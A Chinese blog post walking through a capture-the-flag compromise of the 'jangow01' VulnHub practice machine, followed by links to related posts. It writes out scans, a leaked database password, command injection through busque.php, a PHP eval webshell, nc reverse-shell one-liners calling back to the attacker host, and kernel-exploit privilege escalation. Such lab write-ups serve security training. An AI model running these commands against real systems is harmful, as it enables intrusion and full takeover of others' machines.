jangow01靶机渗透记录

最新推荐文章于 2024-10-01 18:22:37 发布
最新推荐文章于 2024-10-01 18:22:37 发布
阅读量397 收藏 8
点赞数 6
文章标签: php 网络安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/althumi/article/details/135034901
版权 
主机:192.168.10.106
靶机:192.168.10.107

nmap -p- 192.168.10.107

21/tcp open  ftp                                                                                                                                                                                                   
80/tcp open  http

nmap -sS -sV -A -n 192.168.10.107

21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18

dirsearch -u http://192.168.10.107/site/

dirsearch -u http://192.168.10.107

#访问备份文件,发现数据库连接源码,得到用户jangow01的密码
http://192.168.10.107/.backup

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

#访问提供的木马接口查看源码。
http://192.168.10.107/site/busque.php?buscar=cat busque.php

<?php system($_GET['buscar']); ?>

#上传一句话木马,方便蚁剑连接。
http://192.168.10.107/site/busque.php?buscar=echo '<?php @eval($_POST["a"]);' > hack.php

#蚁剑连接成功
http://192.168.10.107/site/hack.php
#因为靶机开启防火墙,只有443端口开放,使用nc获取shell
nc -lvvp 443
#依然禁止了-e参数
nc -e /bin/bash 192.168.10.106 443
#主机获取shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.106 433 >/tmp/f
#开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
#查看靶机信息
uname -a #Linux jangow01 4.4.0-31-generic
#得到靶机系统为ubuntu 16.04
lsb_release -a

Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

#查询可用漏洞
searchsploit ubuntu 4.4.0-31

searchsploit ubuntu 16.04

#获取提权程序源码
searchsploit -m 45010.c

#上传蚁剑编译提权
gcc 45010.c -o exp

#提权成功,通关
cat proof.txt                                                                                                                                                                                                      
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                                                                                                                                         
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                                                                                                                                         
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                                                                                                                                         
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                                                                                                                                         
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                                                                                                                                   
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                                                                                                                                   
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                                                                                                                                   
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                                                                                                                                  
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                                                                                                                                  
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                                                                                                                                 
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                                                                                                                                
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                                                                                                                                
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                                                                                                                                
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                                                                                                                                 
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                                                                                                                                 
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                                                                                                                                  
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                                                                                                                                   
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                                                                                                                                   
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                                                                                                                                   
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                                                                                                                                   
                       @  @@@@@@@@&               JANGOW               &@@@                                                                                                                                        
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                                                                                                                                         
                                     &&&@@@@&%       &/    (&&@@@&&&                                                                                                                                               
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709
althumi
关注
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2727
迟到的文章,就当库存发出来吧~
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
jangow-01-1.0.1 靶机渗透
braty_的博客
04-06 365
看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。
jangow靶机渗透
qq_42307546的博客
01-23 982
今天给大家带来一个简单难度的靶机 首先主机扫描 netdiscover -i eth0 192.168.1.1/24 扫出靶机地址为 192.168.1.13 nmap 扫描 nmap -sV -p 0-6550 192.168.1.13 Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST Nmap scan report for 192.168.1.13 Host is up (0.00071s latency). Not sho
jangow-01-1.0.1靶机渗透测试
weixin_58786230的博客
07-12 216
【代码】jangow-01-1.0.1靶机渗透测试。
靶机渗透日记 Jangow
Anonymous
02-10 296
ip 端口 测试发现不能匿名登录 ftp 目录扫描 发现敏感文件 .backup 访问 浏览网站页面,发现其中一个页面可以执行命令 利用命令执行无法反弹shell,生成一句话 在 /home/jangow01 得到 flag1 发现 443 端口没有被做限制 反弹shell 发现存在 jangow01 用户 使用 .backup 里的账号密码尝试登录 提权 可以看到可以使用 dirtycow 进行提权 ,靶机直接死机 换成 CVE-201..
Jangow靶机攻略
cheapkiller的博客
07-31 190
4.编辑一句话木马注入echo '<?5.接下来查看文件输入ls。搭建jangow靶机环境。3.输入id查看回显位置。6.使用工具蚁剑进行进入。7.我们可以看到进入成功。1.扫描目标主机地址。
超详细jangow-01-1.0.1靶机复现过程
weixin_67729650的博客
08-05 1197
靶机导入到最后的提权这一过程,重在思路的建立.
一次零基础靶机渗透细节全程记录
ran的博客
07-12 3124
渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 422
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
jangow靶机攻击流程
03-24
在这个“jangow靶机攻击流程”中,我们学习了如何逐步渗透一个靶机系统,从信息收集、漏洞利用到权限提升的过程。以下是每个步骤的详细解释: 步骤一:首先,设置靶机网络为桥接模式,并获取其IP地址。这是攻击前的...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
PHP安装后Apache无法运行的问题
最新发布
Bingyeshinvwang的博客
10-01 286
php安装之后,修改httpd.conf无法运行Apache的解决方案
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1246
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 517
PHP反序列化2(OC绕过.wakeup绕过)
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 989
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
php基础语法
liyy614的博客
09-27 1057
PHP(Hypertext Preprocessor)是一种广泛使用的开源服务器端脚本语言,特别适合用于Web开发。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值